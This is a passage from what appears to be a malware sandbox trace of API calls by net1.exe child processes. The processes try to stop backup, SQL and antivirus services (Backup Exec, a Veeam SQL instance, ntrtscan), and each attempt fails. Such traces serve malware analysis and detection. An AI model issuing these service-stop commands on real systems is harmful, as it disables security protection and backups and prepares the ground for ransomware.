[0120.849] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.850] GetFileType (hFile=0x0) returned 0x0 [0120.850] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x763b48 [0120.850] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x763b48, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.850] WriteFile (in: hFile=0x0, lpBuffer=0x763b48, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x27f63c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f63c, lpOverlapped=0x0) returned 0 [0120.850] LocalFree (hMem=0x763b48) returned 0x0 [0120.850] GetFileType (hFile=0x0) returned 0x0 [0120.850] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x766178 [0120.850] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x766178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nv", lpUsedDefaultChar=0x0) returned 2 [0120.850] WriteFile (in: hFile=0x0, lpBuffer=0x766178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f63c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f63c, lpOverlapped=0x0) returned 0 [0120.851] LocalFree (hMem=0x766178) returned 0x0 [0120.851] _ultow (in: _Dest=0x889, _Radix=2618988 | out: _Dest=0x889) returned="2185" [0120.851] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.851] GetFileType (hFile=0x0) returned 0x0 [0120.851] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x766178 [0120.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x766178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.851] WriteFile (in: hFile=0x0, lpBuffer=0x766178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x27f648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f648, lpOverlapped=0x0) returned 0 [0120.851] LocalFree (hMem=0x766178) returned 0x0 [0120.851] GetFileType (hFile=0x0) returned 0x0 [0120.851] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x766178 [0120.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x766178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nv", lpUsedDefaultChar=0x0) returned 2 [0120.851] WriteFile (in: hFile=0x0, lpBuffer=0x766178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f648, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f648, lpOverlapped=0x0) returned 0 [0120.851] LocalFree (hMem=0x766178) returned 0x0 [0120.851] NetApiBufferFree (Buffer=0x761b10) returned 0x0 [0120.852] NetApiBufferFree (Buffer=0x761b28) returned 0x0 [0120.852] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0120.852] exit (_Code=2) Process: id = "242" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x60e9a000" os_pid = "0x1248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "93" os_parent_pid = "0xf90" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 636 os_tid = 0x1260 [0120.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f8bc | out: lpSystemTimeAsFileTime=0x16f8bc*(dwLowDateTime=0x1b6eaef0, dwHighDateTime=0x1d6f0d1)) [0120.279] GetCurrentProcessId () returned 0x1248 [0120.279] GetCurrentThreadId () returned 0x1260 [0120.279] GetTickCount () returned 0x1151584 [0120.279] QueryPerformanceCounter (in: lpPerformanceCount=0x16f8b4 | out: lpPerformanceCount=0x16f8b4*=23937966130) returned 1 [0120.279] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.279] __set_app_type (_Type=0x1) [0120.279] __p__fmode () returned 0x770331f4 [0120.279] __p__commode () returned 0x770331fc [0120.279] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.280] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.280] GetConsoleOutputCP () returned 0x1b5 [0120.280] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.283] sprintf_s (in: _DstBuf=0x16f874, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.283] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.285] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.285] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0120.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f640, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.285] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x78) returned 0x7bf658 [0120.285] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.286] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f844 | out: Buffer=0x16f844*=0x7c1af8) returned 0x0 [0120.286] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f844 | out: Buffer=0x16f844*=0x7c1b10) returned 0x0 [0120.286] _fileno (_File=0x77032900) returned -2 [0120.286] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.286] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.286] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.286] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.286] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.286] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.286] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.286] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.286] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.286] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.286] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.286] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.286] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.286] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.286] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.286] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.286] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.286] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.286] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.286] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.286] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.286] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.286] _wcsicmp (_String1="accounts", _String2="MSSQL$VEEAMSQL2012") returned -12 [0120.286] _wcsicmp (_String1="computer", _String2="MSSQL$VEEAMSQL2012") returned -10 [0120.286] _wcsicmp (_String1="config", _String2="MSSQL$VEEAMSQL2012") returned -10 [0120.286] _wcsicmp (_String1="continue", _String2="MSSQL$VEEAMSQL2012") returned -10 [0120.286] _wcsicmp (_String1="cont", _String2="MSSQL$VEEAMSQL2012") returned -10 [0120.286] _wcsicmp (_String1="file", _String2="MSSQL$VEEAMSQL2012") returned -7 [0120.286] _wcsicmp (_String1="files", _String2="MSSQL$VEEAMSQL2012") returned -7 [0120.286] _wcsicmp (_String1="group", _String2="MSSQL$VEEAMSQL2012") returned -6 [0120.286] _wcsicmp (_String1="groups", _String2="MSSQL$VEEAMSQL2012") returned -6 [0120.287] _wcsicmp (_String1="help", _String2="MSSQL$VEEAMSQL2012") returned -5 [0120.287] _wcsicmp (_String1="helpmsg", _String2="MSSQL$VEEAMSQL2012") returned -5 [0120.287] _wcsicmp (_String1="localgroup", _String2="MSSQL$VEEAMSQL2012") returned -1 [0120.287] _wcsicmp (_String1="pause", _String2="MSSQL$VEEAMSQL2012") returned 3 [0120.287] _wcsicmp (_String1="session", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="sessions", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="sess", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="share", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="start", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="stats", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="statistics", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="stop", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="time", _String2="MSSQL$VEEAMSQL2012") returned 7 [0120.287] _wcsicmp (_String1="user", _String2="MSSQL$VEEAMSQL2012") returned 8 [0120.287] _wcsicmp (_String1="users", _String2="MSSQL$VEEAMSQL2012") returned 8 [0120.287] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0120.287] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2012") returned -14 [0120.287] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.287] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.287] _wcsicmp (_String1="netpopup", _String2="MSSQL$VEEAMSQL2012") returned 1 [0120.287] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.287] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.287] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.287] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.287] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.287] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.287] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0120.287] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0120.287] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0120.287] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.287] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0120.287] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0120.287] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0120.288] _wcsupr (in: _String="MSSQL$VEEAMSQL2012" | out: _String="MSSQL$VEEAMSQL2012") returned="MSSQL$VEEAMSQL2012" [0120.288] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7c5448 [0120.857] GetServiceKeyNameW (in: hSCManager=0x7c5448, lpDisplayName="MSSQL$VEEAMSQL2012", lpServiceName=0x39aaf0, lpcchBuffer=0x16f7e0 | out: lpServiceName="", lpcchBuffer=0x16f7e0) returned 0 [0120.858] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2012") returned -12 [0120.858] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2012") returned -14 [0120.858] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.858] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.858] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.858] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.858] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2012") returned 5 [0120.858] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.858] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.858] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2012") returned 10 [0120.858] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2012") returned 3 [0120.858] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2012") returned -9 [0120.858] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2012") returned -1 [0120.858] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.858] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.859] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2012") returned 6 [0120.859] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2012") returned -1 [0120.859] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2012") returned -12 [0120.859] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2012") returned 1 [0120.859] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2012", opcode=0x0, arg=0x0, bufptr=0x16f7dc | out: bufptr=0x16f7dc) returned 0x889 [0120.861] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.861] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.861] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.863] GetFileType (hFile=0x0) returned 0x0 [0120.863] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7c3e68 [0120.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7c3e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.863] WriteFile (in: hFile=0x0, lpBuffer=0x7c3e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f71c, lpOverlapped=0x0) returned 0 [0120.863] LocalFree (hMem=0x7c3e68) returned 0x0 [0120.863] GetFileType (hFile=0x0) returned 0x0 [0120.863] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6110 [0120.863] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0120.863] WriteFile (in: hFile=0x0, lpBuffer=0x7c6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f71c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f71c, lpOverlapped=0x0) returned 0 [0120.863] LocalFree (hMem=0x7c6110) returned 0x0 [0120.863] _ultow (in: _Dest=0x889, _Radix=1505100 | out: _Dest=0x889) returned="2185" [0120.863] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.864] GetFileType (hFile=0x0) returned 0x0 [0120.864] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7c6110 [0120.864] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7c6110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.864] WriteFile (in: hFile=0x0, lpBuffer=0x7c6110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f728, lpOverlapped=0x0) returned 0 [0120.864] LocalFree (hMem=0x7c6110) returned 0x0 [0120.864] GetFileType (hFile=0x0) returned 0x0 [0120.864] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c6110 [0120.864] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0120.864] WriteFile (in: hFile=0x0, lpBuffer=0x7c6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f728, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f728, lpOverlapped=0x0) returned 0 [0120.864] LocalFree (hMem=0x7c6110) returned 0x0 [0120.865] NetApiBufferFree (Buffer=0x7c1af8) returned 0x0 [0120.865] NetApiBufferFree (Buffer=0x7c1b10) returned 0x0 [0120.865] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2012 /y" [0120.865] exit (_Code=2) Process: id = "243" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5dee6000" os_pid = "0x1240" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "102" os_parent_pid = "0xba8" cmd_line = "C:\\Windows\\system32\\net1 stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 637 os_tid = 0x1098 [0120.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff44 | out: lpSystemTimeAsFileTime=0x12ff44*(dwLowDateTime=0x1b7371b0, dwHighDateTime=0x1d6f0d1)) [0120.311] GetCurrentProcessId () returned 0x1240 [0120.311] GetCurrentThreadId () returned 0x1098 [0120.311] GetTickCount () returned 0x11515a3 [0120.311] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff3c | out: lpPerformanceCount=0x12ff3c*=23941201108) returned 1 [0120.311] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0120.311] __set_app_type (_Type=0x1) [0120.311] __p__fmode () returned 0x770331f4 [0120.312] __p__commode () returned 0x770331fc [0120.312] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0120.312] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0120.312] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.312] GetConsoleOutputCP () returned 0x1b5 [0120.312] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0120.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.315] sprintf_s (in: _DstBuf=0x12fefc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.316] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.318] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.318] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.318] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0120.318] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fcc8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.318] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x0, Size=0x64) returned 0x7a3ad8 [0120.318] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.318] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12fecc | out: Buffer=0x12fecc*=0x7a1ae0) returned 0x0 [0120.318] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12fecc | out: Buffer=0x12fecc*=0x7a1af8) returned 0x0 [0120.318] _fileno (_File=0x77032900) returned -2 [0120.318] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.318] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.318] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.318] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.318] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.318] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.318] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.318] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.318] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.319] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.319] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.319] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.319] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.319] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.319] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.319] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.319] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.319] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.319] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.319] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.319] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.319] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.319] _wcsicmp (_String1="accounts", _String2="ntrtscan") returned -13 [0120.319] _wcsicmp (_String1="computer", _String2="ntrtscan") returned -11 [0120.319] _wcsicmp (_String1="config", _String2="ntrtscan") returned -11 [0120.319] _wcsicmp (_String1="continue", _String2="ntrtscan") returned -11 [0120.319] _wcsicmp (_String1="cont", _String2="ntrtscan") returned -11 [0120.319] _wcsicmp (_String1="file", _String2="ntrtscan") returned -8 [0120.319] _wcsicmp (_String1="files", _String2="ntrtscan") returned -8 [0120.319] _wcsicmp (_String1="group", _String2="ntrtscan") returned -7 [0120.319] _wcsicmp (_String1="groups", _String2="ntrtscan") returned -7 [0120.319] _wcsicmp (_String1="help", _String2="ntrtscan") returned -6 [0120.319] _wcsicmp (_String1="helpmsg", _String2="ntrtscan") returned -6 [0120.319] _wcsicmp (_String1="localgroup", _String2="ntrtscan") returned -2 [0120.319] _wcsicmp (_String1="pause", _String2="ntrtscan") returned 2 [0120.319] _wcsicmp (_String1="session", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="sessions", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="sess", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="share", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="start", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="stats", _String2="ntrtscan") returned 5 [0120.319] _wcsicmp (_String1="statistics", _String2="ntrtscan") returned 5 [0120.320] _wcsicmp (_String1="stop", _String2="ntrtscan") returned 5 [0120.320] _wcsicmp (_String1="time", _String2="ntrtscan") returned 6 [0120.320] _wcsicmp (_String1="user", _String2="ntrtscan") returned 7 [0120.320] _wcsicmp (_String1="users", _String2="ntrtscan") returned 7 [0120.320] _wcsicmp (_String1="msg", _String2="ntrtscan") returned -1 [0120.320] _wcsicmp (_String1="messenger", _String2="ntrtscan") returned -1 [0120.320] _wcsicmp (_String1="receiver", _String2="ntrtscan") returned 4 [0120.320] _wcsicmp (_String1="rcv", _String2="ntrtscan") returned 4 [0120.320] _wcsicmp (_String1="netpopup", _String2="ntrtscan") returned -15 [0120.320] _wcsicmp (_String1="redirector", _String2="ntrtscan") returned 4 [0120.320] _wcsicmp (_String1="redir", _String2="ntrtscan") returned 4 [0120.320] _wcsicmp (_String1="rdr", _String2="ntrtscan") returned 4 [0120.320] _wcsicmp (_String1="workstation", _String2="ntrtscan") returned 9 [0120.320] _wcsicmp (_String1="work", _String2="ntrtscan") returned 9 [0120.320] _wcsicmp (_String1="wksta", _String2="ntrtscan") returned 9 [0120.320] _wcsicmp (_String1="prdr", _String2="ntrtscan") returned 2 [0120.320] _wcsicmp (_String1="devrdr", _String2="ntrtscan") returned -10 [0120.320] _wcsicmp (_String1="lanmanworkstation", _String2="ntrtscan") returned -2 [0120.320] _wcsicmp (_String1="server", _String2="ntrtscan") returned 5 [0120.320] _wcsicmp (_String1="svr", _String2="ntrtscan") returned 5 [0120.320] _wcsicmp (_String1="srv", _String2="ntrtscan") returned 5 [0120.320] _wcsicmp (_String1="lanmanserver", _String2="ntrtscan") returned -2 [0120.320] _wcsicmp (_String1="alerter", _String2="ntrtscan") returned -13 [0120.320] _wcsicmp (_String1="netlogon", _String2="ntrtscan") returned -15 [0120.320] _wcsupr (in: _String="ntrtscan" | out: _String="NTRTSCAN") returned="NTRTSCAN" [0120.321] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7a54a8 [0120.867] GetServiceKeyNameW (in: hSCManager=0x7a54a8, lpDisplayName="NTRTSCAN", lpServiceName=0x39aaf0, lpcchBuffer=0x12fe68 | out: lpServiceName="", lpcchBuffer=0x12fe68) returned 0 [0120.868] _wcsicmp (_String1="msg", _String2="NTRTSCAN") returned -1 [0120.868] _wcsicmp (_String1="messenger", _String2="NTRTSCAN") returned -1 [0120.868] _wcsicmp (_String1="receiver", _String2="NTRTSCAN") returned 4 [0120.868] _wcsicmp (_String1="rcv", _String2="NTRTSCAN") returned 4 [0120.868] _wcsicmp (_String1="redirector", _String2="NTRTSCAN") returned 4 [0120.868] _wcsicmp (_String1="redir", _String2="NTRTSCAN") returned 4 [0120.868] _wcsicmp (_String1="rdr", _String2="NTRTSCAN") returned 4 [0120.868] _wcsicmp (_String1="workstation", _String2="NTRTSCAN") returned 9 [0120.868] _wcsicmp (_String1="work", _String2="NTRTSCAN") returned 9 [0120.868] _wcsicmp (_String1="wksta", _String2="NTRTSCAN") returned 9 [0120.868] _wcsicmp (_String1="prdr", _String2="NTRTSCAN") returned 2 [0120.868] _wcsicmp (_String1="devrdr", _String2="NTRTSCAN") returned -10 [0120.868] _wcsicmp 